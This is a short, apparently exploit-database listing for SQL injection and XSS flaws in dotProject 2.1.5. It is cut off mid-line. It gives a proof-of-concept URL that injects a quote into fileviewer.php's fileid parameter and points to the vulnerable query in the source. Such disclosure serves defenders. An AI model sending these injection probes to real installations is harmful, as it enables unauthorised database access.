dotproject 2.1.5 Xss / Sql Injection Vulnerabilities

Exploit for php platform in category web applications author: lemlajt software : dotproject version: 2.1.5 tested on: linux cve : PoC : http://localhost/www/cmsadmins/dotpro/dotproject/fileviewer.php?fileid=' in src: 2 ./dotproject/fileviewer.php:127 dbloadHash'SELECT FROM dotpfiles WHERE fileid ...